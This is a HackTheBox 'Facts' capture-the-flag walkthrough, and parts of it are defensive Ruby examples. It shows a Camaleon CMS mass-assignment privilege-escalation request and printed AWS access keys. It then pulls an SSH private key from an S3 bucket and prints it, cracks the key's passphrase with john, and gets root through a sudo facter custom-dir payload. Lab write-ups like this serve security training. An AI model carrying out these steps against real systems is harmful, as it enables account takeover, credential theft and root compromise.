---
# System prepended metadata

title: HTB Facts

---

[TOC]
## Fact
https://app.hackthebox.com/machines/Facts?sort_by=created_at&sort_type=desc

![image](https://hackmd.io/_uploads/Sy72Z85sWe.png)

### Finding services & versions
:::info
nmap 10.129.244.96 -sV -A
:::
The target has ports 80 and 22 open.
![image](https://hackmd.io/_uploads/r1uUSHqoZl.png)

Looked up exploitable CVEs for the versions found, but found nothing...

### Port 80
Visiting the site, it turned out to be a blog-like website; from the screenshot below it is a Camaleon CMS, a dynamic content management system built on Ruby on Rails.
![image](https://hackmd.io/_uploads/HJx9NBqibg.png)

Browsing further I found /page and /search, but fuzzing their parameters gave no interesting responses. Brute-forcing paths turned up an admin path that only redirects; following the redirect leads to a login page.
![image](https://hackmd.io/_uploads/HyzmNBcibl.png)
![image](https://hackmd.io/_uploads/ByNmvBcsbl.png)

Looking at the larger known Camaleon CMS vulnerabilities, CVE-2025-2304 and CVE-2024-46986, I initially had no idea how to use them, but after finding the login page CVE-2025-2304 looked worth trying.


### CVE-2025-2304
:::info
The problem is in `.permit!`:
it lets every value the user submitted under `params.require` be written straight into the database.
Given input like `{ "password" => "hacked123", "role" => "admin", "is_admin" => true }`,
`.permit!` writes each value into the matching column; if the model has a `role` or `is_admin` column, changing those values is a privilege escalation.

```
# vulnerable pattern: permit! lets every submitted attribute through
def updated_ajax
  user_params = params.require(:user).permit!
  current_user.update(user_params)   # role / is_admin are written too
end
```

:::
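
As an added illustration (not Camaleon CMS code and not from the original writeup), the following Ruby mimics the `permit!` behaviour described above beside an allowlist version; the `User` struct, the column names and the request body are constructed for the example:

```ruby
# Added example (not Camaleon CMS code): why `params.require(:user).permit!`
# followed by `update` is dangerous, and what an explicit allowlist changes.
# The User struct and the request body below are constructed for this example.

# Stand-in for the user row; `role` and `is_admin` are the privileged columns.
User = Struct.new(:username, :password, :role, :is_admin, keyword_init: true)

# Columns a self-service password form is allowed to write.
ALLOWED_FIELDS = %w[password].freeze
# Columns that must never be writable from a user-facing form.
PRIVILEGED_FIELDS = %w[role is_admin].freeze

# Mimics `permit!` + `update`: every key in the body is written to the model,
# so a caller who adds role/is_admin to the form promotes themselves.
def update_with_permit_bang(user, params)
  params.each { |k, v| user[k.to_sym] = v if user.members.include?(k.to_sym) }
  user
end

# Mimics `permit(:password)`: keys outside the allowlist are dropped, and the
# dropped keys are returned so the caller can log or alert on them.
def update_with_allowlist(user, params)
  allowed = params.select { |k, _| ALLOWED_FIELDS.include?(k) }
  rejected = params.keys - allowed.keys
  allowed.each { |k, v| user[k.to_sym] = v }
  [user, rejected]
end

# Detection hook: true when a request to the password endpoint carries
# privileged columns, which a legitimate form never sends.
def privilege_tampering?(params)
  !(params.keys & PRIVILEGED_FIELDS).empty?
end

def fresh_user
  User.new(username: "bali", password: "old", role: "user", is_admin: false)
end

# Constructed body in the shape of the one described above.
ATTACK_BODY = { "password" => "hacked123", "role" => "admin", "is_admin" => true }.freeze

def demo_mass_assignment
  vulnerable = update_with_permit_bang(fresh_user, ATTACK_BODY)
  hardened, rejected = update_with_allowlist(fresh_user, ATTACK_BODY)
  {
    vulnerable_role: vulnerable.role, vulnerable_is_admin: vulnerable.is_admin,
    hardened_role: hardened.role, hardened_is_admin: hardened.is_admin,
    rejected: rejected, flagged: privilege_tampering?(ATTACK_BODY)
  }
end

puts demo_mass_assignment if $PROGRAM_NAME == __FILE__
```

With the same body, the `permit!`-style update ends with `role == "admin"`, while the allowlist version keeps `role == "user"` and reports `role` and `is_admin` as rejected keys, which is the signal an application log or WAF rule should alert on.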


http://facts.htb/admin/login
```
POST /admin/login HTTP/1.1

Host: facts.htb

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Encoding: gzip, deflate

Accept-Language: en-US,en;q=0.9

Cookie: _factsapp_session=%2FdC6I7ol%2Bst1r8szKGGGd70DRB9lRXDhhXapQn9cj%2BNXGJ8CACjSbX3pDH7h2WxSsUac4olxtHkj5MlSuklGUWJjdAakFEDEvpOizWVRMWRLoS6LJz1YfY6Oe96cRvdwKmy98PxakYZR76hMPYya2tCVsebe3NFWhCNkD9dR%2B9AXV1JNL6aFEW1alO1uSN1wrJvldrlTzZXW9e7z2Fe4P0XGQLMtGx1BgoRC6PBw80UbCRVM6snFHEKVu91JWri7RLWZk78yde%2FEDeb061oZZdSZ3%2B9LDmsZts7%2BrxkRIzB7DhuBGqddEA9WWh6M3KYGwIzOz4RAiLAMuWclxOdjtzaZn4mk55YbG5hcmB3dLhjJ%2Fy6Yx9fahx0%3D--mqau9n9PDQ0g%2Bqre--uFsKcWyH3o%2BNbCdVzVvxYQ%3D%3D

Connection: close



authenticity_token=5J91WenYidkCIXYmi6EDjxwxlXNodhEqVxWcKDOpP5MxjQ2zhHbhQpgp0dTvvFFQ91oe2yffVaRDbXW_gpE6TQ&user%5Busername%5D=bali&user%5Bpassword%5D=bali123&user%5Brole%5D=admin&user%5Bis_admin%5D=true
```

```
POST /admin/users/5 HTTP/1.1

Host: facts.htb

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Encoding: gzip, deflate

Accept-Language: en-US,en;q=0.9

Cookie: auth_token=uQJH7h7nrGq_Co1ogCX2-A%26Mozilla%2F5.0+%28Windows+NT+10.0%3B+Win64%3B+x64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F120.0.0.0+Safari%2F537.36%2610.10.17.197; _factsapp_session=N64ab2HTYUUR9dmltZwhf7yhHbQ%2B9%2BmU6WSWp3cF8YK4%2Fw50LQJgcs0G97kSQEKm74kMY93%2BWNRDJhee79rFGAk4Cdjbio7z7%2FqUUp%2BK0Du25IjbJ6dKrCRBf7R2fvy81ifNQNhqtCm02KgNxka%2FhYP95QfvDQN8FJEpww9Z6bns9j0FST9pjKQOhEig8HnaV%2Bs6RQQ9AOulWV0zULr3J5RFd%2F6cdf8fU7lPfPZlZoAT8mBuoj62ejYJC5WBy3IdbAHCqqxv3QSpWxliiEFB0ltlVEbzEc5CfNsaJqvIvm8kX%2FXH6u%2FFjJlWHNtYh%2F8%2FmF%2FG3vDZZCz0pQfIyxoxsaBWd3MXCVdzRIanf59mjfcKYEeuNJ0Rt0E%3D--S10wtQURSEyIy0vX--sHUYaQ6RoMiuBwDsaU8zEw%3D%3D

Connection: close



_method=patch&authenticity_token=EpeFMQpTE_8sm88Uh13SfCn7mgL0WYSutwnIVelCr7pZNz5ijiIZDsBQA3ztn8aakjTdrN_Rknx9FSMdv9pIvg&meta%5Bavatar%5D=&user%5Busername%5D=bali&user%5Bemail%5D=test%40test.com&user%5Bfirst_name%5D=bali&user%5Blast_name%5D=lin&meta%5Bslogan%5D=123&user%5Brole%5D=admin&user%5Bis_admin%5D=true
```
My own attempts kept failing, so I used an existing open-source PoC for the CVE:
https://github.com/d3vn0mi/cve-2025-2304-poc
What finally worked was `password[role]=admin`, not `user[role]=admin`.
![image](https://hackmd.io/_uploads/ByCQfHfhbe.png)

Now an admin.
![image](https://hackmd.io/_uploads/SJHHVrGhZg.png)

Poking around, I found AWS S3 information:
![image](https://hackmd.io/_uploads/Bk5pZuQnZl.png)
```
AKIA808C72183237BB40
ZkKBOjSNm2V82l3w6Pu2+JcRe8PS2bTwaipboiaW
randomfacts
us-east-1
http://localhost:54321
http://facts.htb/randomfacts
```
### Using AWS S3

A profile has to be configured before the CLI can be used:
```
aws configure --profile facts
```

I kept trying under randomfacts, but it only held image files.
I also tried uploading odd things, but that does nothing; S3 does not execute objects.
```
aws --endpoint-url http://10.129.16.65:54321 --profile facts s3 ls s3://randomfacts/ --recursive
```
![image](https://hackmd.io/_uploads/rJ8ffd72Zg.png)

Then I asked an AI how to list bucket names and found s3://internal:
```
aws --endpoint-url http://10.129.16.65:54321 --profile facts s3 ls
```
![image](https://hackmd.io/_uploads/S1jumdmnZe.png)

With s3://internal found, list what is under it; the .ssh/id_ed25519 private key is visible below:
```
aws --endpoint-url http://10.129.16.65:54321 --profile facts s3 ls s3://internal --recursive
```
![image](https://hackmd.io/_uploads/HJoHEOm3be.png)
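
As an added example (not from the writeup and not an AWS CLI feature), this Ruby parses the text that `aws s3 ls --recursive` prints and flags object keys that should never sit in a bucket, which is how a listing like the one above would be triaged in bulk; the sample listing and the sensitivity patterns are constructed assumptions:

```ruby
# Added example (not from the page or the AWS CLI): triage an
# `aws s3 ls --recursive` listing for keys that should never be in a bucket.
# SAMPLE_LISTING is constructed to resemble the output format; the patterns
# are an assumption about what counts as sensitive and should be extended.
SENSITIVE_PATTERNS = [
  %r{(^|/)\.ssh/},                            # anything under an ssh directory
  %r{(^|/)id_(rsa|ed25519|ecdsa)(\.pub)?$},   # key files outside .ssh too
  %r{\.pem$},
  %r{(^|/)\.(env|profile|bashrc|bash_history)$},
  %r{(^|/)credentials$},
].freeze

Entry = Struct.new(:date, :time, :size, :key)

# Parses one listing line of the form "YYYY-MM-DD HH:MM:SS <size> <key>";
# returns nil for lines that do not match (blank lines, "PRE" prefix rows).
def parse_listing_line(line)
  m = line.match(/\A(\d{4}-\d{2}-\d{2})\s+(\d{2}:\d{2}:\d{2})\s+(\d+)\s+(.+?)\s*\z/)
  return nil unless m
  Entry.new(m[1], m[2], m[3].to_i, m[4])
end

def parse_listing(text)
  text.lines.filter_map { |l| parse_listing_line(l) }
end

# Entries whose key matches any sensitive pattern.
def sensitive_entries(entries)
  entries.select { |e| SENSITIVE_PATTERNS.any? { |p| e.key.match?(p) } }
end

# Constructed listing in the shape of the real one (sizes and dates invented).
SAMPLE_LISTING = <<~LIST
  2025-01-10 09:12:01        419 .ssh/id_ed25519
  2025-01-10 09:12:01        107 .ssh/id_ed25519.pub
  2025-01-10 09:12:01        807 .profile
  2025-01-10 09:12:01     482913 pics/fact01.jpg
  2025-01-10 09:12:01      91233 pics/fact02.png
LIST

# Returns the keys that need attention for the sample listing.
def demo_bucket_triage
  sensitive_entries(parse_listing(SAMPLE_LISTING)).map(&:key)
end

puts demo_bucket_triage if $PROGRAM_NAME == __FILE__
```

Run against a real listing, the same function turns a long object list into a short list of keys to pull from the bucket and rotate.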

There is no cat here, so use cp with `-` as the destination, which means stdout:
```
aws --endpoint-url http://10.129.16.65:54321 --profile facts s3 cp s3://internal/.ssh/id_ed25519 -
```

:::success
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABBLs0gLF4
f3h4rIOAN0rEVWAAAAGAAAAAEAAAAzAAAAC3NzaC1lZDI1NTE5AAAAIKSV0hsk3XXWG35D
Ee0iM+VycFL1iX7XT2+EZEca0JT+AAAAoKRfk3KY9C5sh1631FGpWKcFnGkYYDRLcvFjCc
SpOX1fWyvAsgiWekvdlSDa9wvnXSNMgSIqeMRhvbcCnbG7O/scfB7JB76wjdkA04HIZW8n
eA95dUj/xnFM7yMC7dUs50F+JAy+ySCDAUiCGdu7qrjIiNIev35IVraXROfDPZG2La3W1w
tOnayYMscBftBBuprbvIxIEEZolYLCfFeIQm4=
-----END OPENSSH PRIVATE KEY-----

:::

Also worth checking .profile, which may hold useful clues about the environment:
:::success
```
# ~/.profile: executed by the command interpreter for login shells.
# This file is not read by bash(1), if ~/.bash_profile or ~/.bash_login
# exists.
# see /usr/share/doc/bash/examples/startup-files for examples.
# the files are located in the bash-doc package.
# the default umask is set in /etc/profile; for setting the umask
# for ssh logins, install and configure the libpam-umask package.
#umask 022

# if running bash
if [ -n "$BASH_VERSION" ]; then
    # include .bashrc if it exists
    if [ -f "$HOME/.bashrc" ]; then
        . "$HOME/.bashrc"
    fi
fi

# set PATH so it includes user's private bin if it exists
if [ -d "$HOME/bin" ] ; then
    PATH="$HOME/bin:$PATH"
fi

# set PATH so it includes user's private bin if it exists
if [ -d "$HOME/.local/bin" ] ; then
    PATH="$HOME/.local/bin:$PATH"
fi
```
:::

### SSH connection
Although I now have the private key, I still don't know which account it belongs to.
I tried the following:
```
id_ed25519
admin
internal
randomfacts
```

Using the key as-is produces this error:
:::info
WARNING: UNPROTECTED PRIVATE KEY FILE! 
:::
To get rid of it, set the key file's permissions to 600:
```
chmod 600 htbKey
```


Afterwards I also hit this error, which means the private key is passphrase-protected, so a passphrase is needed:
:::info
Load key "sshKey": incorrect passphrase supplied to decrypt private key
:::
The message above appeared because I tried `ssh-keygen -y -f sshKey` to find the login account, but since it needs the passphrase, the passphrase has to be cracked first.

#### Cracking the passphrase
First convert the format:
```
ssh2john sshKey > sshKey.hash
```
Then crack it with john and show the password:
```
john --wordlist=/usr/share/wordlists/rockyou.txt sshKey.hash

john --show sshKey.hash 
```
<!-- ![image](https://hackmd.io/_uploads/r18cnKm2Wl.png) -->

#### Finding the SSH account
With the passphrase known, return to this command: it prints the corresponding public key, whose comment includes the account:
```
ssh-keygen -y -f sshKey
```
:::success
Enter passphrase for "sshKey": 
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKSV0hsk3XXWG35DEe0iM+VycFL1iX7XT2+EZEca0JT+ trivia@facts.htb

:::
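
To show why the passphrase was needed for the account name but not for the public half, here is an added Ruby example (not part of the original writeup) that parses the openssh-key-v1 envelope of the private key recovered above: the cipher and KDF names and the public key are stored in the clear, while the comment holding `trivia@facts.htb` sits in the encrypted section. The `comment` branch for unencrypted keys follows the documented format and is not exercised by this key:

```ruby
require "base64"

# Added example (not from the writeup): parse the openssh-key-v1 envelope.
# RECOVERED_KEY is the private key shown earlier on the page.
RECOVERED_KEY = <<~KEY
  -----BEGIN OPENSSH PRIVATE KEY-----
  b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABBLs0gLF4
  f3h4rIOAN0rEVWAAAAGAAAAAEAAAAzAAAAC3NzaC1lZDI1NTE5AAAAIKSV0hsk3XXWG35D
  Ee0iM+VycFL1iX7XT2+EZEca0JT+AAAAoKRfk3KY9C5sh1631FGpWKcFnGkYYDRLcvFjCc
  SpOX1fWyvAsgiWekvdlSDa9wvnXSNMgSIqeMRhvbcCnbG7O/scfB7JB76wjdkA04HIZW8n
  eA95dUj/xnFM7yMC7dUs50F+JAy+ySCDAUiCGdu7qrjIiNIev35IVraXROfDPZG2La3W1w
  tOnayYMscBftBBuprbvIxIEEZolYLCfFeIQm4=
  -----END OPENSSH PRIVATE KEY-----
KEY

# Reads one SSH wire "string" (uint32 big-endian length, then that many bytes)
# at offset `off`; returns [value, offset_after].
def read_ssh_string(buf, off)
  len = buf.byteslice(off, 4).unpack1("N")
  [buf.byteslice(off + 4, len), off + 4 + len]
end

def read_u32(buf, off)
  [buf.byteslice(off, 4).unpack1("N"), off + 4]
end

# Returns a hash describing the key. :comment is filled only when the private
# section is unencrypted (cipher "none"); otherwise it is nil because the
# comment can only be read after the passphrase-derived key decrypts it.
def parse_openssh_key(pem)
  body = pem.lines.reject { |l| l.start_with?("-----") }.join
  buf = Base64.decode64(body)
  magic = "openssh-key-v1\0"
  raise "not an openssh-key-v1 file" unless buf.byteslice(0, magic.bytesize) == magic
  off = magic.bytesize
  cipher, off = read_ssh_string(buf, off)        # "none" or e.g. "aes256-ctr"
  kdf, off = read_ssh_string(buf, off)           # "none" or "bcrypt"
  _kdf_options, off = read_ssh_string(buf, off)  # salt + rounds when bcrypt
  nkeys, off = read_u32(buf, off)
  pub_blob, off = read_ssh_string(buf, off)      # public key, always in clear
  key_type, _ = read_ssh_string(pub_blob, 0)
  priv_section, _off = read_ssh_string(buf, off) # encrypted unless cipher none

  comment = nil
  if cipher == "none"
    # Plaintext layout: checkint, checkint, then keytype, pub, priv, comment.
    p = 8
    _type, p = read_ssh_string(priv_section, p)
    _pub, p = read_ssh_string(priv_section, p)
    _priv, p = read_ssh_string(priv_section, p)
    comment, _p = read_ssh_string(priv_section, p)
  end

  {
    cipher: cipher, kdf: kdf, nkeys: nkeys, key_type: key_type,
    passphrase_protected: cipher != "none",
    public_key: "#{key_type} #{Base64.strict_encode64(pub_blob)}",
    comment: comment,
  }
end

if $PROGRAM_NAME == __FILE__
  info = parse_openssh_key(RECOVERED_KEY)
  puts "cipher=#{info[:cipher]} kdf=#{info[:kdf]} protected=#{info[:passphrase_protected]}"
  puts info[:public_key]
  puts "comment: #{info[:comment] || '(encrypted, passphrase required)'}"
end
```

Because the public blob is plaintext, the public key string printed here is the same one `ssh-keygen -y` produced above, minus the comment; a defender can compute the key's fingerprint and search `authorized_keys` files for it without ever cracking the passphrase.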

Now with the private key, its passphrase and the account, I can ssh in.
Successfully got onto the target machine and grabbed the first flag.
![image](https://hackmd.io/_uploads/S19uatm2-x.png)

### Privilege escalation
<!-- Try privilege escalation starting from the most common step: look for files that run with root privileges
```
find / -perm -u=s -type f 2>/dev/null
```
- -perm: search for a specific permission bit
- -type f: restrict to regular files
-->


For privilege escalation, first check the sudo list; /usr/bin/facter can be run without a password:
```
sudo -l
```
:::success
Matching Defaults entries for trivia on facts:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User trivia may run the following commands on facts:
    (ALL) NOPASSWD: /usr/bin/facter

:::

Looked up https://gtfobins.org/ to see how facter can be abused.

The issue with facter is that it lets users write custom Ruby scripts to extend it:
when facter runs, it actively looks for and executes those .rb files.
![image](https://hackmd.io/_uploads/HJjzGcQnbg.png)
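
As an added audit example (not from the writeup), the following Ruby parses `sudo -l` output like the one above and flags NOPASSWD rules for binaries that load caller-supplied code, which is the review a defender would run across a fleet; the sample output and the list of such binaries are constructed assumptions:

```ruby
# Added example (not from the page): audit `sudo -l` output for NOPASSWD rules
# on binaries that accept an option to load code from a caller-controlled
# directory (as facter does with --custom-dir). SAMPLE_SUDO_L mirrors the
# shape of the real output; CODE_LOADING_BINARIES is a hand-maintained
# starter list and an assumption, not an exhaustive catalogue.
SudoRule = Struct.new(:runas, :tags, :command)

CODE_LOADING_BINARIES = %w[facter ruby python3 perl bash].freeze

# Parses lines such as "    (ALL) NOPASSWD: /usr/bin/facter" that follow the
# "may run the following commands" header; Defaults lines are ignored.
def parse_sudo_l(text)
  in_rules = false
  text.lines.filter_map do |raw|
    line = raw.strip
    if line =~ /may run the following commands/
      in_rules = true
      next nil
    end
    next nil unless in_rules && !line.empty?
    m = line.match(/\A\((?<runas>[^)]*)\)\s*(?<tags>(?:[A-Z]+:\s*)*)(?<cmd>.+)\z/)
    next nil unless m
    SudoRule.new(m[:runas], m[:tags].scan(/[A-Z]+/), m[:cmd])
  end
end

# Rules that need attention: passwordless, and either unrestricted (ALL) or a
# binary that will run code from a directory the invoking user controls.
def risky_rules(rules)
  rules.select do |r|
    base = File.basename(r.command.split.first)
    r.tags.include?("NOPASSWD") && (r.command == "ALL" || CODE_LOADING_BINARIES.include?(base))
  end
end

# Constructed output in the shape of the one shown above, plus a benign rule.
SAMPLE_SUDO_L = <<~OUT
  Matching Defaults entries for trivia on facts:
      env_reset, mail_badpass, use_pty

  User trivia may run the following commands on facts:
      (ALL) NOPASSWD: /usr/bin/facter
      (root) /usr/bin/systemctl restart nginx
OUT

def demo_sudo_audit
  risky_rules(parse_sudo_l(SAMPLE_SUDO_L)).map(&:command)
end

puts demo_sudo_audit if $PROGRAM_NAME == __FILE__
```

The fix on the sudoers side is to drop NOPASSWD for such binaries or to pin the allowed arguments so that options like `--custom-dir` cannot be supplied; the parser above makes those rules easy to find before someone else does.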

So first write a malicious rb file:
```
echo 'exec "/bin/bash"' > /tmp/exploit.rb
```
Then use sudo to have facter load the malicious file:
```
sudo facter --custom-dir=/tmp x
```
![image](https://hackmd.io/_uploads/BylFz9mnWe.png)

Then go find the second flag.